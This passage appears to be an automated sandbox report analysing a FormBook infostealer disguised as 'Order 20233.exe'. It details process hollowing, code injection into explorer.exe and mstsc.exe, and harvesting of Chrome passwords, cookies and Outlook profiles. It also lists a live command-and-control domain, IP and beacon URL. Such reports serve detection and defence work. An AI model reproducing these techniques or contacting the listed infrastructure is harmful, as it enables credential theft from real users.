Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]	17_2_0192740D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]	17_2_0192740D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]	17_2_0192740D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188BC2C mov eax, dword ptr fs:[00000030h]	17_2_0188BC2C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A44B mov eax, dword ptr fs:[00000030h]	17_2_0188A44B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EC450 mov eax, dword ptr fs:[00000030h]	17_2_018EC450
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EC450 mov eax, dword ptr fs:[00000030h]	17_2_018EC450
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187746D mov eax, dword ptr fs:[00000030h]	17_2_0187746D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01868794 mov eax, dword ptr fs:[00000030h]	17_2_01868794
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]	17_2_018D7794
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]	17_2_018D7794
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]	17_2_018D7794
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018937F5 mov eax, dword ptr fs:[00000030h]	17_2_018937F5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A70E mov eax, dword ptr fs:[00000030h]	17_2_0188A70E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A70E mov eax, dword ptr fs:[00000030h]	17_2_0188A70E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187F716 mov eax, dword ptr fs:[00000030h]	17_2_0187F716
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EFF10 mov eax, dword ptr fs:[00000030h]	17_2_018EFF10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EFF10 mov eax, dword ptr fs:[00000030h]	17_2_018EFF10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192070D mov eax, dword ptr fs:[00000030h]	17_2_0192070D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0192070D mov eax, dword ptr fs:[00000030h]	17_2_0192070D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01854F2E mov eax, dword ptr fs:[00000030h]	17_2_01854F2E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01854F2E mov eax, dword ptr fs:[00000030h]	17_2_01854F2E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188E730 mov eax, dword ptr fs:[00000030h]	17_2_0188E730
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186EF40 mov eax, dword ptr fs:[00000030h]	17_2_0186EF40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186FF60 mov eax, dword ptr fs:[00000030h]	17_2_0186FF60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928F6A mov eax, dword ptr fs:[00000030h]	17_2_01928F6A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EFE87 mov eax, dword ptr fs:[00000030h]	17_2_018EFE87
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D46A7 mov eax, dword ptr fs:[00000030h]	17_2_018D46A7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]	17_2_01920EA5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]	17_2_01920EA5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]	17_2_01920EA5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928ED6 mov eax, dword ptr fs:[00000030h]	17_2_01928ED6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018836CC mov eax, dword ptr fs:[00000030h]	17_2_018836CC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01898EC7 mov eax, dword ptr fs:[00000030h]	17_2_01898EC7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190FEC0 mov eax, dword ptr fs:[00000030h]	17_2_0190FEC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018676E2 mov eax, dword ptr fs:[00000030h]	17_2_018676E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018816E0 mov ecx, dword ptr fs:[00000030h]	17_2_018816E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]	17_2_0185C600
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]	17_2_0185C600
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]	17_2_0185C600
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01888E00 mov eax, dword ptr fs:[00000030h]	17_2_01888E00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A61C mov eax, dword ptr fs:[00000030h]	17_2_0188A61C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A61C mov eax, dword ptr fs:[00000030h]	17_2_0188A61C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911608 mov eax, dword ptr fs:[00000030h]	17_2_01911608
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185E620 mov eax, dword ptr fs:[00000030h]	17_2_0185E620
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190FE3F mov eax, dword ptr fs:[00000030h]	17_2_0190FE3F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]	17_2_01867E41
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191AE44 mov eax, dword ptr fs:[00000030h]	17_2_0191AE44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191AE44 mov eax, dword ptr fs:[00000030h]	17_2_0191AE44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186766D mov eax, dword ptr fs:[00000030h]	17_2_0186766D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]	17_2_0187AE73
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]	17_2_0187AE73
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]	17_2_0187AE73
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]	17_2_0187AE73
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]	17_2_0187AE73

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 17_2_018999A0 NtCreateSection,LdrInitializeThunk,

17_2_018999A0

Source: C:\Users\user\Desktop\Order 20233.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.239.221.71 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ahmedo.ch

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1310000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Order 20233.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 11DF008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Order 20233.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 3452	Jump to behavior

Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.323500035.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.369946324.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.380301258.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.311808218.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Order 20233.exe

Queries volume information: C:\Users\user\Desktop\Order 20233.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order 20233.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mstsc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	712 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	712 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Order 20233.exe	51%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles
Order 20233.exe	40%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
17.0.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
www.ahmedo.ch	4%	Virustotal	Browse
iamme-label.com	9%	Virustotal	Browse
www.iamme-label.com	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.sysinternals.com0	0%	URL Reputation	safe
http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==	100%	Avira URL Cloud	malware
www.ahmedo.ch/dcn0/	10%	Virustotal		Browse
www.ahmedo.ch/dcn0/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.ahmedo.ch	213.239.221.71	true	true	4%, Virustotal, Browse	unknown
iamme-label.com	81.169.145.80	true	false	9%, Virustotal, Browse	unknown
www.iamme-label.com	unknown	unknown	true	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.ahmedo.ch/dcn0/	true	10%, Virustotal, Browse Avira URL Cloud: malware	low
http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	4184-48M.21.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high
https://duckduckgo.com/chrome_newtab	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high
https://duckduckgo.com/ac/?q=	4184-48M.21.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high
https://www.sysinternals.com0	Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	4184-48M.21.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	4184-48M.21.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.239.221.71	www.ahmedo.ch	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	780222
Start date and time:	2023-01-08 16:21:13 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order 20233.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@22/2@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 33.5% (good quality ratio 29.1%) Quality average: 71.4% Quality standard deviation: 33.6%
HCA Information:	Successful, ratio: 97% Number of executed functions: 56 Number of non-executed functions: 132
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
